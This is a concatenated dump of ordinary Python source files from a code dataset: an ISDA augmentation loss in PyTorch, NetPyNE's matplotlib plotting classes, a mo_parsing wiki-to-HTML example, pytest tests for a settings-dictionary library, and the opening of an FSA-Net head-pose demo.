sum_weight_AV + self.Amount.view(C, 1).expand(C, A)
)
weight_AV[weight_AV != weight_AV] = 0
additional_CV = weight_CV.mul(1 - weight_CV).mul(
torch.bmm(
(self.Ave - ave_CxA).view(C, A, 1),
(self.Ave - ave_CxA).view(C, 1, A)
)
)
self.CoVariance = (self.CoVariance.mul(1 - weight_CV) + var_temp
.mul(weight_CV)).detach() + additional_CV.detach()
self.Ave = (self.Ave.mul(1 - weight_AV) + ave_CxA.mul(weight_AV)).detach()
self.Amount += onehot.sum(0)
class ISDALoss(nn.Module):
def __init__(self, feature_num, class_num):
super(ISDALoss, self).__init__()
self.estimator = EstimatorCV(feature_num, class_num)
self.class_num = class_num
self.cross_entropy = nn.CrossEntropyLoss()
def isda_aug(self, fc, features, y, labels, cv_matrix, ratio):
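        # ISDA surrogate: each logit j is shifted by 0.5 * ratio * (w_j - w_y)^T Sigma_y (w_j - w_y),
        # the closed-form upper bound of the expected cross-entropy when the features of class y
        # are implicitly augmented with Gaussian noise N(0, ratio * Sigma_y).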
N = features.size(0)
C = self.class_num
A = features.size(1)
weight_m = list(fc.parameters())[0]
NxW_ij = weight_m.expand(N, C, A)
NxW_kj = torch.gather(NxW_ij,
1,
labels.view(N, 1, 1)
.expand(N, C, A))
CV_temp = cv_matrix[labels]
# sigma2 = ratio * \
# torch.bmm(torch.bmm(NxW_ij - NxW_kj,
# CV_temp).view(N * C, 1, A),
# (NxW_ij - NxW_kj).view(N * C, A, 1)).view(N, C)
sigma2 = ratio * \
torch.bmm(torch.bmm(NxW_ij - NxW_kj,
CV_temp),
(NxW_ij - NxW_kj).permute(0, 2, 1))
sigma2 = sigma2.mul(torch.eye(C)#.cuda()
.expand(N, C, C)).sum(2).view(N, C)
aug_result = y + 0.5 * sigma2
return aug_result
def forward(self, model, fc, x, target_x, ratio):
features = model(x)
y = fc(features)
self.estimator.update_CV(features.detach(), target_x)
isda_aug_y = self.isda_aug(fc, features, y, target_x, self.estimator.CoVariance.detach(), ratio)
loss = self.cross_entropy(isda_aug_y, target_x)
return loss, y
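if __name__ == '__main__':
    # A minimal, self-contained sketch of driving ISDALoss with a toy feature extractor.
    # The sizes and the fixed ratio below are made-up illustrations (in practice the
    # ratio is typically annealed over training).
    torch.manual_seed(0)
    feature_num, class_num = 16, 3
    model = nn.Sequential(nn.Flatten(), nn.Linear(8, feature_num), nn.ReLU())
    fc = nn.Linear(feature_num, class_num)
    criterion = ISDALoss(feature_num, class_num)
    x = torch.randn(4, 8)                        # batch of 4 toy samples
    target = torch.randint(0, class_num, (4,))   # toy labels
    loss, logits = criterion(model, fc, x, target, ratio=0.5)
    loss.backward()
    print(loss.item(), logits.shape)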
| 2.390625 | 2 |
netpyne/plotting/plotter.py | sanjayankur31/netpyne | 0 | 5006 | """
Module for plotting analyses
"""
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
from copy import deepcopy
import pickle, json
import os
from matplotlib.offsetbox import AnchoredOffsetbox
try:
basestring
except NameError:
basestring = str
colorList = [[0.42, 0.67, 0.84], [0.90, 0.76, 0.00], [0.42, 0.83, 0.59], [0.90, 0.32, 0.00], [0.34, 0.67, 0.67], [0.90, 0.59, 0.00], [0.42, 0.82, 0.83], [1.00, 0.85, 0.00], [0.33, 0.67, 0.47], [1.00, 0.38, 0.60], [0.57, 0.67, 0.33], [0.50, 0.20, 0.00], [0.71, 0.82, 0.41], [0.00, 0.20, 0.50], [0.70, 0.32, 0.10]] * 3
class MetaFigure:
"""A class which defines a figure object"""
def __init__(self, kind, sim=None, subplots=None, rcParams=None, autosize=0.35, **kwargs):
if not sim:
from .. import sim
self.sim = sim
self.kind = kind
# Make a copy of the current matplotlib rcParams and update them
self.orig_rcParams = deepcopy(mpl.rcParamsDefault)
if rcParams:
for rcParam in rcParams:
if rcParam in mpl.rcParams:
mpl.rcParams[rcParam] = rcParams[rcParam]
else:
print(rcParam, 'not found in matplotlib.rcParams')
self.rcParams = rcParams
else:
self.rcParams = self.orig_rcParams
# Set up any subplots
if not subplots:
nrows = 1
ncols = 1
elif type(subplots) == int:
nrows = subplots
ncols = 1
elif type(subplots) == list:
nrows = subplots[0]
ncols = subplots[1]
# Create figure
if 'figSize' in kwargs:
figSize = kwargs['figSize']
else:
figSize = self.rcParams['figure.figsize']
if 'dpi' in kwargs:
dpi = kwargs['dpi']
else:
dpi = self.rcParams['figure.dpi']
if autosize:
maxplots = np.max([nrows, ncols])
figSize0 = figSize[0] + (maxplots-1)*(figSize[0]*autosize)
figSize1 = figSize[1] + (maxplots-1)*(figSize[1]*autosize)
figSize = [figSize0, figSize1]
self.fig, self.ax = plt.subplots(nrows, ncols, figsize=figSize, dpi=dpi)
self.plotters = []
def saveFig(self, sim=None, fileName=None, fileDesc=None, fileType='png', fileDir=None, overwrite=True, **kwargs):
"""
'eps': 'Encapsulated Postscript',
'jpg': 'Joint Photographic Experts Group',
'jpeg': 'Joint Photographic Experts Group',
'pdf': 'Portable Document Format',
'pgf': 'PGF code for LaTeX',
'png': 'Portable Network Graphics',
'ps': 'Postscript',
'raw': 'Raw RGBA bitmap',
'rgba': 'Raw RGBA bitmap',
'svg': 'Scalable Vector Graphics',
'svgz': 'Scalable Vector Graphics',
'tif': 'Tagged Image File Format',
'tiff': 'Tagged Image File Format'
"""
if not sim:
from .. import sim
if fileDesc is not None:
fileDesc = '_' + str(fileDesc)
else:
fileDesc = '_' + self.kind
if fileType not in self.fig.canvas.get_supported_filetypes():
raise Exception('fileType not recognized in saveFig')
else:
fileExt = '.' + fileType
if not fileName or not isinstance(fileName, basestring):
fileName = self.sim.cfg.filename + fileDesc + fileExt
else:
if fileName.endswith(fileExt):
fileName = fileName.split(fileExt)[0] + fileDesc + fileExt
else:
fileName = fileName + fileDesc + fileExt
if fileDir is not None:
fileName = os.path.join(fileDir, fileName)
if not overwrite:
while os.path.isfile(fileName):
try:
fileNumStr = fileName.split(fileExt)[0].split('_')[-1]
fileNumStrNew = str(int(fileNumStr) + 1).zfill(2)
fileName = fileName.split('_' + fileNumStr)[0]
except:
fileNumStr = fileNumStrNew = '01'
fileName = fileName.split(fileExt)[0]
fileName = fileName.split(fileNumStr)[0] + '_' + fileNumStrNew + fileExt
self.fig.savefig(fileName)
self.fileName = fileName
return fileName
def showFig(self, **kwargs):
try:
self.fig.show(block=False)
except:
self.fig.show()
def addSuptitle(self, **kwargs):
self.fig.suptitle(**kwargs)
def finishFig(self, **kwargs):
if 'suptitle' in kwargs:
if kwargs['suptitle']:
self.addSuptitle(**kwargs['suptitle'])
if 'tightLayout' not in kwargs:
plt.tight_layout()
elif kwargs['tightLayout']:
plt.tight_layout()
if 'saveFig' in kwargs:
if kwargs['saveFig']:
self.saveFig(**kwargs)
if 'showFig' in kwargs:
if kwargs['showFig']:
self.showFig(**kwargs)
else:
plt.close(self.fig)
# Reset the matplotlib rcParams to their original settings
mpl.style.use(self.orig_rcParams)
class GeneralPlotter:
"""A class used for plotting"""
def __init__(self, data, kind, axis=None, sim=None, rcParams=None, metafig=None, **kwargs):
"""
Parameters
----------
data : dict, str
axis : matplotlib axis
The axis to plot into. If axis is set to None, a new figure and axis are created and plotted into. If plotting into an existing axis, more options are available: xtwin, ytwin,
"""
self.kind = kind
# Load data
if type(data) == str:
if os.path.isfile(data):
self.data = self.loadData(data)
else:
raise Exception('In Plotter, if data is a string, it must be the path to a data file.')
else:
self.data = data
if not sim:
from .. import sim
self.sim = sim
self.axis = axis
if metafig:
self.metafig = metafig
# If an axis is input, plot there; otherwise make a new figure and axis
if self.axis is None:
final = True
self.metafig = MetaFigure(kind=self.kind, **kwargs)
self.fig = self.metafig.fig
self.axis = self.metafig.ax
else:
self.fig = self.axis.figure
# Attach plotter to its MetaFigure
self.metafig.plotters.append(self)
def loadData(self, fileName, fileDir=None, sim=None):
from ..analysis import loadData
self.data = loadData(fileName=fileName, fileDir=fileDir, sim=None)
def saveData(self, fileName=None, fileDesc=None, fileType=None, fileDir=None, sim=None, **kwargs):
from ..analysis import saveData as saveFigData
saveFigData(self.data, fileName=fileName, fileDesc=fileDesc, fileType=fileType, fileDir=fileDir, sim=sim, **kwargs)
def formatAxis(self, **kwargs):
if 'title' in kwargs:
self.axis.set_title(kwargs['title'])
if 'xlabel' in kwargs:
self.axis.set_xlabel(kwargs['xlabel'])
if 'ylabel' in kwargs:
self.axis.set_ylabel(kwargs['ylabel'])
if 'xlim' in kwargs:
if kwargs['xlim'] is not None:
self.axis.set_xlim(kwargs['xlim'])
if 'ylim' in kwargs:
if kwargs['ylim'] is not None:
self.axis.set_ylim(kwargs['ylim'])
if 'invert_yaxis' in kwargs:
if kwargs['invert_yaxis'] is True:
self.axis.invert_yaxis()
def addLegend(self, handles=None, labels=None, **kwargs):
legendParams = ['loc', 'bbox_to_anchor', 'fontsize', 'numpoints', 'scatterpoints', 'scatteryoffsets', 'markerscale', 'markerfirst', 'frameon', 'fancybox', 'shadow', 'framealpha', 'facecolor', 'edgecolor', 'mode', 'bbox_transform', 'title', 'title_fontsize', 'borderpad', 'labelspacing', 'handlelength', 'handletextpad', 'borderaxespad', 'columnspacing', 'handler_map']
# Check for and apply any legend parameters in the kwargs
legendKwargs = {}
for kwarg in kwargs:
if kwarg in legendParams:
legendKwargs[kwarg] = kwargs[kwarg]
# If 'legendKwargs' is found in kwargs, use those values instead of the defaults
if 'legendKwargs' in kwargs:
legendKwargs_new = kwargs['legendKwargs']
for key in legendKwargs_new:
if key in legendParams:
legendKwargs[key] = legendKwargs_new[key]
cur_handles, cur_labels = self.axis.get_legend_handles_labels()
if not handles:
handles = cur_handles
if not labels:
labels = cur_labels
self.axis.legend(handles, labels, **legendKwargs)
def addScalebar(self, matchx=True, matchy=True, hidex=True, hidey=True, unitsx=None, unitsy=None, scalex=1.0, scaley=1.0, xmax=None, ymax=None, space=None, **kwargs):
add_scalebar(self.axis, matchx=matchx, matchy=matchy, hidex=hidex, hidey=hidey, unitsx=unitsx, unitsy=unitsy, scalex=scalex, scaley=scaley, xmax=xmax, ymax=ymax, space=space, **kwargs)
def addColorbar(self, **kwargs):
plt.colorbar(mappable=self.axis.get_images()[0], ax=self.axis, **kwargs)
def finishAxis(self, **kwargs):
self.formatAxis(**kwargs)
if 'saveData' in kwargs:
if kwargs['saveData']:
self.saveData(**kwargs)
if 'dpi' in kwargs:
if kwargs['dpi']:
self.fig.set_dpi(kwargs['dpi'])
if 'figSize' in kwargs:
if kwargs['figSize']:
self.fig.set_size_inches(kwargs['figSize'])
if 'legend' in kwargs:
if kwargs['legend'] is True:
self.addLegend(**kwargs)
elif type(kwargs['legend']) == dict:
self.addLegend(**kwargs['legend'])
if 'scalebar' in kwargs:
if kwargs['scalebar'] is True:
self.addScalebar()
elif type(kwargs['scalebar']) == dict:
self.addScalebar(**kwargs['scalebar'])
if 'colorbar' in kwargs:
if kwargs['colorbar'] is True:
self.addColorbar()
elif type(kwargs['colorbar']) == dict:
self.addColorbar(**kwargs['colorbar'])
if 'grid' in kwargs:
self.axis.minorticks_on()
if kwargs['grid'] is True:
self.axis.grid()
elif type(kwargs['grid']) == dict:
self.axis.grid(**kwargs['grid'])
# If this is the only axis on the figure, finish the figure
if type(self.metafig.ax) != list:
self.metafig.finishFig(**kwargs)
# Reset the matplotlib rcParams to their original settings
mpl.style.use(self.metafig.orig_rcParams)
class ScatterPlotter(GeneralPlotter):
"""A class used for scatter plotting"""
def __init__(self, data, axis=None, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'scatter'
self.x = data.get('x')
self.y = data.get('y')
self.s = data.get('s')
self.c = data.get('c')
self.marker = data.get('marker')
self.linewidth = data.get('linewidth')
self.cmap = data.get('cmap')
self.norm = data.get('norm')
self.alpha = data.get('alpha')
self.linewidths = data.get('linewidths')
def plot(self, **kwargs):
scatterPlot = self.axis.scatter(x=self.x, y=self.y, s=self.s, c=self.c, marker=self.marker, linewidth=self.linewidth, cmap=self.cmap, norm=self.norm, alpha=self.alpha, linewidths=self.linewidths)
self.finishAxis(**kwargs)
return self.fig
class LinePlotter(GeneralPlotter):
"""A class used for plotting one line per subplot"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'line'
self.x = np.array(data.get('x'))
self.y = np.array(data.get('y'))
self.color = data.get('color')
self.marker = data.get('marker')
self.markersize = data.get('markersize')
self.linewidth = data.get('linewidth')
self.alpha = data.get('alpha')
def plot(self, **kwargs):
linePlot = self.axis.plot(self.x, self.y, color=self.color, marker=self.marker, markersize=self.markersize, linewidth=self.linewidth, alpha=self.alpha)
self.finishAxis(**kwargs)
return self.fig
class LinesPlotter(GeneralPlotter):
"""A class used for plotting multiple lines on the same axis"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'lines'
self.x = np.array(data.get('x'))
self.y = np.array(data.get('y'))
self.color = data.get('color')
self.marker = data.get('marker')
self.markersize = data.get('markersize')
self.linewidth = data.get('linewidth')
self.alpha = data.get('alpha')
self.label = data.get('label')
def plot(self, **kwargs):
numLines = len(self.y)
if type(self.color) != list:
colors = [self.color for line in range(numLines)]
else:
colors = self.color
if type(self.marker) != list:
markers = [self.marker for line in range(numLines)]
else:
markers = self.marker
if type(self.markersize) != list:
markersizes = [self.markersize for line in range(numLines)]
else:
markersizes = self.markersize
if type(self.linewidth) != list:
linewidths = [self.linewidth for line in range(numLines)]
else:
linewidths = self.linewidth
if type(self.alpha) != list:
alphas = [self.alpha for line in range(numLines)]
else:
alphas = self.alpha
if self.label is None:
labels = [None for line in range(numLines)]
else:
labels = self.label
for index, line in enumerate(self.y):
self.axis.plot(
self.x,
self.y[index],
color=colors[index],
marker=markers[index],
markersize=markersizes[index],
linewidth=linewidths[index],
alpha=alphas[index],
label=labels[index],
)
self.finishAxis(**kwargs)
return self.fig
class HistPlotter(GeneralPlotter):
"""A class used for histogram plotting"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'histogram'
self.x = data.get('x')
self.bins = data.get('bins', None)
self.range = data.get('range', None)
self.density = data.get('density', False)
self.weights = data.get('weights', None)
self.cumulative = data.get('cumulative', False)
self.bottom = data.get('bottom', None)
self.histtype = data.get('histtype', 'bar')
self.align = data.get('align', 'mid')
self.orientation = data.get('orientation', 'vertical')
self.rwidth = data.get('rwidth', None)
self.log = data.get('log', False)
self.color = data.get('color', None)
self.alpha = data.get('alpha', None)
self.label = data.get('label', None)
self.stacked = data.get('stacked', False)
self.data = data.get('data', None)
def plot(self, **kwargs):
histPlot = self.axis.hist(self.x, bins=self.bins, range=self.range, density=self.density, weights=self.weights, cumulative=self.cumulative, bottom=self.bottom, histtype=self.histtype, align=self.align, orientation=self.orientation, rwidth=self.rwidth, log=self.log, color=self.color, alpha=self.alpha, label=self.label, stacked=self.stacked, data=self.data)
self.finishAxis(**kwargs)
return self.fig
class ImagePlotter(GeneralPlotter):
"""A class used for image plotting using plt.imshow"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'image'
self.X = data.get('X')
self.cmap = data.get('cmap', None)
self.norm = data.get('norm', None)
self.aspect = data.get('aspect', None)
self.interpolation = data.get('interpolation', None)
self.alpha = data.get('alpha', None)
self.vmin = data.get('vmin', None)
self.vmax = data.get('vmax', None)
self.origin = data.get('origin', None)
self.extent = data.get('extent', None)
self.aspect = data.get('aspect', None)
self.interpolation = data.get('interpolation', None)
self.filternorm = data.get('filternorm', True)
self.filterrad = data.get('filterrad', 4.0)
self.resample = data.get('resample', None)
self.url = data.get('url', None)
self.data = data.get('data', None)
def plot(self, **kwargs):
imagePlot = self.axis.imshow(self.X, cmap=self.cmap, norm=self.norm, aspect=self.aspect, interpolation=self.interpolation, alpha=self.alpha, vmin=self.vmin, vmax=self.vmax, origin=self.origin, extent=self.extent, filternorm=self.filternorm, filterrad=self.filterrad, resample=self.resample, url=self.url, data=self.data)
self.finishAxis(**kwargs)
return self.fig
class AnchoredScaleBar(AnchoredOffsetbox):
"""
A class used for adding scale bars to plots
"""
def __init__(self, axis, sizex=0, sizey=0, labelx=None, labely=None, loc=4, pad=0.1, borderpad=0.1, sep=2, prop=None, barcolor="black", barwidth=None, **kwargs):
"""
Draw a horizontal and/or vertical bar with the size in data coordinate
of the give axes. A label will be drawn underneath (center-aligned).
- transform : the coordinate frame (typically axes.transData)
- sizex,sizey : width of x,y bar, in data units. 0 to omit
- labelx,labely : labels for x,y bars; None to omit
- loc : position in containing axes
- pad, borderpad : padding, in fraction of the legend font size (or prop)
- sep : separation between labels and bars in points.
- **kwargs : additional arguments passed to base class constructor
"""
from matplotlib.patches import Rectangle
from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea
bars = AuxTransformBox(axis.transData)
if sizex:
if axis.xaxis_inverted():
sizex = -sizex
bars.add_artist(Rectangle((0,0), sizex, 0, ec=barcolor, lw=barwidth, fc="none"))
if sizey:
if axis.yaxis_inverted():
sizey = -sizey
bars.add_artist(Rectangle((0,0), 0, sizey, ec=barcolor, lw=barwidth, fc="none"))
if sizex and labelx:
self.xlabel = TextArea(labelx)
bars = VPacker(children=[bars, self.xlabel], align="center", pad=0, sep=sep)
if sizey and labely:
self.ylabel = TextArea(labely)
bars = HPacker(children=[self.ylabel, bars], align="center", pad=0, sep=sep)
AnchoredOffsetbox.__init__(self, loc, pad=pad, borderpad=borderpad, child=bars, prop=prop, frameon=False, **kwargs)
def add_scalebar(axis, matchx=True, matchy=True, hidex=True, hidey=True, unitsx=None, unitsy=None, scalex=1.0, scaley=1.0, xmax=None, ymax=None, space=None, **kwargs):
"""
Add scalebars to axes
Adds a set of scale bars to *ax*, matching the size to the ticks of the plot and optionally hiding the x and y axes
- axis : the axis to attach ticks to
- matchx,matchy : if True, set size of scale bars to spacing between ticks, if False, set size using sizex and sizey params
- hidex,hidey : if True, hide x-axis and y-axis of parent
- **kwargs : additional arguments passed to AnchoredScaleBars
Returns created scalebar object
"""
def get_tick_size(subaxis):
tick_size = None
tick_locs = subaxis.get_majorticklocs()
if len(tick_locs)>1:
tick_size = np.abs(tick_locs[1] - tick_locs[0])
return tick_size
if matchx:
sizex = get_tick_size(axis.xaxis)
if matchy:
sizey = get_tick_size(axis.yaxis)
if 'sizex' in kwargs:
sizex = kwargs['sizex']
if 'sizey' in kwargs:
sizey = kwargs['sizey']
def autosize(value, maxvalue, scale, n=1, m=10):
round_to_n = lambda value, n, m: int(np.ceil(round(value, -int(np.floor(np.log10(abs(value)))) + (n - 1)) / m)) * m
while value > maxvalue:
try:
value = round_to_n(0.8 * maxvalue * scale, n, m) / scale
except:
value /= 10.0
m /= 10.0
return value
if ymax is not None and sizey>ymax:
sizey = autosize(sizey, ymax, scaley)
if xmax is not None and sizex>xmax:
sizex = autosize(sizex, xmax, scalex)
kwargs['sizex'] = sizex
kwargs['sizey'] = sizey
if unitsx is None:
unitsx = ''
if unitsy is None:
unitsy = ''
if 'labelx' not in kwargs or kwargs['labelx'] is None:
kwargs['labelx'] = '%.3g %s'%(kwargs['sizex'] * scalex, unitsx)
if 'labely' not in kwargs or kwargs['labely'] is None:
kwargs['labely'] = '%.3g %s'%(kwargs['sizey'] * scaley, unitsy)
# add space for scalebar
if space is not None:
ylim0, ylim1 = axis.get_ylim()
ylim = (ylim0 - space, ylim1)
if ylim0 > ylim1: # if y axis is inverted
ylim = (ylim0 + space, ylim1)
axis.set_ylim(ylim)
scalebar = AnchoredScaleBar(axis, **kwargs)
axis.add_artist(scalebar)
if hidex:
axis.xaxis.set_visible(False)
if hidey:
axis.yaxis.set_visible(False)
if hidex and hidey:
axis.set_frame_on(False)
return scalebar
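if __name__ == '__main__':
    # A minimal sketch of add_scalebar on a plain matplotlib axis; the data below
    # is synthetic and this block is illustration only, not part of the NetPyNE API.
    fig, axis = plt.subplots()
    t = np.linspace(0, 1, 500)
    axis.plot(t, np.sin(2 * np.pi * 5 * t))
    add_scalebar(axis, unitsx='s', unitsy='a.u.')   # bar sizes default to the tick spacing
    fig.savefig('scalebar_example.png')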
| 2.203125 | 2 |
examples/simpleWiki.py | klahnakoski/mo-parsing | 1 | 5007 | from mo_parsing.helpers import QuotedString
# ParseFatalException is raised in convertToHTML_A below but was never imported;
# assumed here to be exported at the package root, as in pyparsing:
from mo_parsing import ParseFatalException
wikiInput = """
Here is a simple Wiki input:
*This is in italics.*
**This is in bold!**
***This is in bold italics!***
Here's a URL to {{Pyparsing's Wiki Page->https://site-closed.wikispaces.com}}
"""
def convertToHTML(opening, closing):
def conversionParseAction(t, l, s):
return opening + t[0] + closing
return conversionParseAction
italicized = QuotedString("*").add_parse_action(convertToHTML("<I>", "</I>"))
bolded = QuotedString("**").add_parse_action(convertToHTML("<B>", "</B>"))
boldItalicized = QuotedString("***").add_parse_action(convertToHTML("<B><I>", "</I></B>"))
def convertToHTML_A(t, l, s):
try:
text, url = t[0].split("->")
except ValueError:
raise ParseFatalException(s, l, "invalid URL link reference: " + t[0])
return '<A href="{}">{}</A>'.format(url, text)
urlRef = QuotedString("{{", end_quote_char="}}").add_parse_action(convertToHTML_A)
wikiMarkup = urlRef | boldItalicized | bolded | italicized
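# A minimal usage sketch. Assumption: mo_parsing mirrors pyparsing's transformString()
# as transform_string(); the exact method name is not confirmed here and may differ.
if __name__ == '__main__':
    print(wikiMarkup.transform_string(wikiInput))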
| 3.125 | 3 |
tests/test_app_settings_dict.py | wheelercj/app_settings | 0 | 5008 | <filename>tests/test_app_settings_dict.py<gh_stars>0
import pytest
import re
from typing import Any, Tuple
from dataclasses import dataclass
from app_settings_dict import Settings
def test_simple_settings() -> None:
settings = Settings(
settings_file_path="C:/Users/chris/Documents/sample_settings_file_name.json",
default_factories={
"key1": lambda: "value1",
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
del settings["key1"]
del settings["key2"]
assert "key1" not in settings
assert "key2" not in settings
assert settings["key1"] == "value1"
with pytest.raises(KeyError):
settings["key2"]
def test_default_settings() -> None:
settings = Settings(
settings_file_path="sample settings file name.json",
default_factories={
"key1": lambda: "value1",
"key2": lambda: "value2",
"key3": lambda: "value3",
},
default_settings={
"key3": [],
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
assert settings["key3"] == "value3"
del settings["key3"]
assert settings["key3"] == "value3"
settings.reset("key3")
assert settings["key3"] == []
settings["key3"] = "something"
assert settings["key3"] == "something"
settings.reset_all()
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
assert settings["key3"] == []
def test_load_without_file() -> None:
def sample_prompt_function(settings: Settings) -> Settings:
# s = input("Enter the settings: ")
return settings.update({"key1": "a", "key2": "b"})
settings = Settings(
settings_file_path="not a real file.yaml",
prompt_user_for_all_settings=sample_prompt_function,
default_factories={
"key1": lambda: "value1",
"key2": lambda: "value2",
"key3": lambda: "value3",
},
default_settings={
"key3": [],
"key4": "value4",
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
assert settings["key3"] == "value3"
settings.load(fallback_option="prompt user")
assert settings["key1"] == "a"
assert settings["key2"] == "b"
assert settings["key3"] == "value3"
with pytest.raises(KeyError):
settings["key4"]
settings.load(fallback_option="default settings")
assert settings["key1"] == "a"
assert settings["key2"] == "b"
assert settings["key3"] == "value3"
assert settings["key4"] == "value4"
settings.clear()
settings.load(fallback_option="default settings")
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
assert settings["key3"] == []
assert settings["key4"] == "value4"
with pytest.raises(ValueError):
settings.load(fallback_option="invalid option")
def test_load_after_empty() -> None:
settings = Settings(
settings_file_path="sample settings file name.json",
prompt_user_for_all_settings=lambda: 1 / 0,
default_factories={
"key1": lambda: "value1",
},
default_settings={
"key1": [],
},
data={
"key1": "hello",
},
)
assert settings["key1"] == "hello"
settings.clear()
assert settings["key1"] == "value1"
def test_prompt() -> None:
def sample_prompt_function() -> Any:
# s = input("Enter a setting: ")
return "a"
settings = Settings(
settings_file_path="sample settings file name.json",
prompt_user_for_all_settings=lambda: {"key1": "a", "key2": "b"},
default_factories={
"key1": sample_prompt_function,
"key2": lambda: "value2",
"key3": lambda: "value3",
},
default_settings={
"key3": [],
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings["key1"] == "hello"
settings.prompt("key1")
assert settings["key1"] == "a"
def test_changing_settings_before_load() -> None:
settings = Settings(
settings_file_path="sample settings file name.json",
default_factories={
"key1": lambda: "value1",
},
default_settings={
"key1": [],
},
data={
"key1": "hello",
},
)
assert settings["key1"] == "hello"
settings.load(fallback_option="default settings")
assert settings["key1"] == "hello"
settings["key1"] = "a"
settings.load(fallback_option="default settings")
assert settings["key1"] == "a"
def test_update() -> None:
settings = Settings(
settings_file_path="sample settings file name.json",
default_factories={
"key1": lambda: "value1",
},
default_settings={
"key1": [],
},
data={
"key1": "hello",
},
)
assert settings["key1"] == "hello"
settings.update({"key1": "a"})
assert settings["key1"] == "a"
settings.update({"key2": "b"})
assert settings["key2"] == "b"
def test_Settings__is_using_json() -> None:
settings = Settings(
settings_file_path="sample_settings_file_name.json",
default_factories={
"key1": lambda: "value1",
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings._Settings__is_using_json()
settings.settings_file_path = "sample_settings_file_name.yaml"
assert not settings._Settings__is_using_json()
def test_load_from_dict() -> None:
settings = Settings()
settings.load_from_dict(
{
"key1": "hello",
"key2": "world",
}
)
assert len(settings.data) == 0
settings = Settings(
data={
"key1": "a",
"key2": "b",
}
)
settings.load_from_dict(
{
"key1": "c",
"key2": "d",
}
)
assert settings.data["key1"] == "c"
assert settings.data["key2"] == "d"
def test_dump_to_dict() -> None:
settings = Settings(
settings_file_path="sample_settings_file_name.json",
data={
"key1": "hello",
"key2": "world",
},
)
assert settings.dump_to_dict() == {
"key1": "hello",
"key2": "world",
}
def test_nested_Settings() -> None:
settings = Settings(
settings_file_path="sample_settings_file_name.json",
default_settings={
"key6": [],
"key7": Settings(
data={
"key8": "value8",
}
),
},
data={
"key1": "hello",
"key2": "world",
"key3": "value3",
"key4": Settings(
settings_file_path="why would anyone want an inner file though.yaml",
data={
"key5": "value5",
},
),
},
)
assert settings.dump_to_dict() == {
"key1": "hello",
"key2": "world",
"key3": "value3",
"key4": {
"key5": "value5",
},
}
def test_creating_setting_after_init() -> None:
settings = Settings(
settings_file_path="sample_settings_file_name.json",
default_settings={
"key1": [],
"key2": "value2",
},
)
with pytest.raises(KeyError):
settings["key3"] = "value3"
def test_prompt_error() -> None:
settings = Settings(
settings_file_path="nonexistent file.json",
default_settings={
"key1": [],
"key2": "value2",
},
)
with pytest.raises(ValueError):
settings.load(fallback_option="prompt user")
def test_nested_setting_loaders_and_dumpers() -> None:
@dataclass
class Coords:
x: int
y: int
def __init__(self, x_and_y: Tuple[int, int]) -> None:
self.x = x_and_y[0]
self.y = x_and_y[1]
settings = Settings(
setting_loader=Coords,
setting_dumper=lambda obj: (obj.x, obj.y),
data={
"location 1": Coords(x_and_y=(1, 2)),
"location 2": Coords(x_and_y=(3, 4)),
"patterns": Settings(
setting_loader=re.compile,
setting_dumper=lambda x: x.pattern,
data={
"phone number pattern": re.compile(r"\d{3}-?\d{3}-?\d{4}"),
"email address pattern": re.compile(
r"[\w\d.+-]+@[\w\d.-]+\.[\w\d]+"
),
},
),
},
)
settings_dict = settings.dump_to_dict()
assert settings_dict["location 1"] == (1, 2)
assert settings_dict["location 2"] == (3, 4)
assert settings_dict["patterns"]["phone number pattern"] == r"\d{3}-?\d{3}-?\d{4}"
assert (
settings_dict["patterns"]["email address pattern"]
== r"[\w\d.+-]+@[\w\d.-]+\.[\w\d]+"
)
settings.load_from_dict(settings_dict)
assert settings["location 1"] == Coords(x_and_y=(1, 2))
assert settings["location 2"] == Coords(x_and_y=(3, 4))
assert settings["patterns"]["phone number pattern"] == re.compile(
r"\d{3}-?\d{3}-?\d{4}"
)
assert settings["patterns"]["email address pattern"] == re.compile(
r"[\w\d.+-]+@[\w\d.-]+\.[\w\d]+"
)
def test_init_without_keywords() -> None:
with pytest.raises(TypeError):
Settings("sample settings file path.json")
| 2.40625 | 2 |
demo/demo_FSANET_ssd.py | jacke121/FSA-Net | 0 | 5009 | import os
import time
import cv2
import sys
sys.path.append('..')
import numpy as np
from math import cos, sin
from lib.FSANET_model import *
import numpy as np
from keras.layers import Average
def draw_axis(img, yaw, pitch, roll, tdx=None, tdy=None, size = 50):
print(yaw,roll,pitch)
pitch = pitch * np.pi / 180
yaw = -(yaw * np.pi / 180)
roll = roll * np.pi / 180
    if tdx is None or tdy is None:
        height, width = img.shape[:2]
        tdx = width / 2
        tdy = height / 2
# X-Axis pointing to right. drawn in red
x1 = size * (cos(yaw) * cos(roll)) + tdx
y1 = size * (cos(pitch) * sin(roll) + cos(roll) * sin(pitch) * sin(yaw)) + tdy
# Y-Axis | drawn in green
# v
x2 = size * (-cos(yaw) * sin(roll)) + tdx
y2 = size * (cos(pitch) * cos(roll) - sin(pitch) * sin(yaw) * sin(roll)) + tdy
# Z-Axis (out of the screen) drawn in blue
x3 = size * (sin(yaw)) + tdx
y3 = size * (-cos(yaw) * sin(pitch)) + tdy
cv2.line(img, (int(tdx), int(tdy)), (int(x1),int(y1)),(0,0,255),3)
cv2.line(img, (int(tdx), int(tdy)), (int(x2),int(y2)),(0,255,0),3)
cv2.line(img, (int(tdx), int(tdy)), (int(x3),int(y3)),(255,0,0),2)
return img
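# Example (sketch, not part of the original demo): draw_axis can be exercised on a
# blank canvas to visualize an arbitrary pose; the angle values below are arbitrary
# and given in degrees.
#
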